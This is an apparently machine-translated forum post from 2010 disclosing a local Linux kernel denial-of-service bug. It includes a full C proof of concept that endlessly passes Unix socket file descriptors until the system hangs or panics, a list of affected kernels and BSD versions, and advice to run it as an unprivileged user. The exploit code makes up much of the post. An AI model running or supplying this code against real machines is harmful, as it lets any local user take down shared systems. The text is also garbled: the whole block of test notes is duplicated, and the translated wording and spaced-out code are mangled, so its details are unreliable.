Local Linux kernel vulnerability (and more), DoS
Published code that causes the computer to freeze (100% load of all cores, exhaustion of file descriptors).
Link to code: lkml.org/lkml/2010/11/25/8
Tested on 27, 32 - hangup is playing. 32/64 bits.
')
I clarify: after 1-2 seconds the crash dump flies (I don’t have time to read), the host is overloaded. In another test, the system dropped after the program was completed (after about 5-7 seconds).
PS Experts from Laura say that FreeBSD 8.1 is also falling.
PPS Suddenly - on CentOS 5.5 with 2.6.18 does not fall. If you run from under the root, it drops, from under the user, it just quietly works. In this case, the root in the next console does not interfere with work and the system does not fall.
I am trying to clarify the situation:
1) CentOS 2.6.18 / 64 with an unprivileged user is not affected.
2) Debian Squeeze 2.6.34 / 64 with a non-user-delegated (kernel panic).
3) According to rumors, in some FreeBSD it was possible to reproduce (from the comments, FreeBSD 8.2-PRERELEASE is not reproduced)
4) From comments - on Ubuntu 2.6.32 / 64 could not be played, at 2.6.36 is played.
5) Ubuntu 2.6.34 / 64 - playing
6) From the comments - RHEL5.5 does not freeze, but it slows down and makes it difficult to kill the process.
7) From comments: FreeBSD 4.11, 8.1, OpebBSD 4.6, 4.8, DragonFLY BSD 2.8.0 - are subject
8) OpenVZ + 2.6.18 Debian / Centos - not playable.
PPPS for those who test - you need to run from an unselected user.
Test text:
Link to code: lkml.org/lkml/2010/11/25/8
Tested on 27, 32 - hangup is playing. 32/64 bits.
')
I clarify: after 1-2 seconds the crash dump flies (I don’t have time to read), the host is overloaded. In another test, the system dropped after the program was completed (after about 5-7 seconds).
PS Experts from Laura say that FreeBSD 8.1 is also falling.
PPS Suddenly - on CentOS 5.5 with 2.6.18 does not fall. If you run from under the root, it drops, from under the user, it just quietly works. In this case, the root in the next console does not interfere with work and the system does not fall.
I am trying to clarify the situation:
1) CentOS 2.6.18 / 64 with an unprivileged user is not affected.
2) Debian Squeeze 2.6.34 / 64 with a non-user-delegated (kernel panic).
3) According to rumors, in some FreeBSD it was possible to reproduce (from the comments, FreeBSD 8.2-PRERELEASE is not reproduced)
4) From comments - on Ubuntu 2.6.32 / 64 could not be played, at 2.6.36 is played.
5) Ubuntu 2.6.34 / 64 - playing
6) From the comments - RHEL5.5 does not freeze, but it slows down and makes it difficult to kill the process.
7) From comments: FreeBSD 4.11, 8.1, OpebBSD 4.6, 4.8, DragonFLY BSD 2.8.0 - are subject
8) OpenVZ + 2.6.18 Debian / Centos - not playable.
PPPS for those who test - you need to run from an unselected user.
Test text:
#include <sys / socket.h>
#include <sys / un.h>
static int send_fd (int unix_fd, int fd)
{
struct msghdr msgh;
struct cmsghdr * cmsg;
char buf [CMSG_SPACE (sizeof (fd))];
memset (& msgh, 0, sizeof (msgh));
memset (buf, 0, sizeof (buf));
msgh.msg_control = buf;
msgh.msg_controllen = sizeof (buf);
cmsg = CMSG_FIRSTHDR (& msgh);
cmsg-> cmsg_len = CMSG_LEN (sizeof (fd));
cmsg-> cmsg_level = SOL_SOCKET;
cmsg-> cmsg_type = SCM_RIGHTS;
msgh.msg_controllen = cmsg-> cmsg_len;
memcpy (CMSG_DATA (cmsg), & fd, sizeof (fd));
return sendmsg (unix_fd, & msgh, 0);
}
int main ()
{
int fd [2], ff [2];
int target;
if (socketpair (PF_UNIX, SOCK_SEQPACKET, 0, fd) == - 1)
return 1;
for (;;)
{
if (socketpair (PF_UNIX, SOCK_SEQPACKET, 0, ff) == - 1)
return 2;
send_fd (ff [0], fd [0]);
send_fd (ff [0], fd [1]);
close (fd [1]);
close (fd [0]);
fd [0] = ff [0];
fd [1] = ff [1];
}
}
Source: https://habr.com/ru/post/108835/
All Articles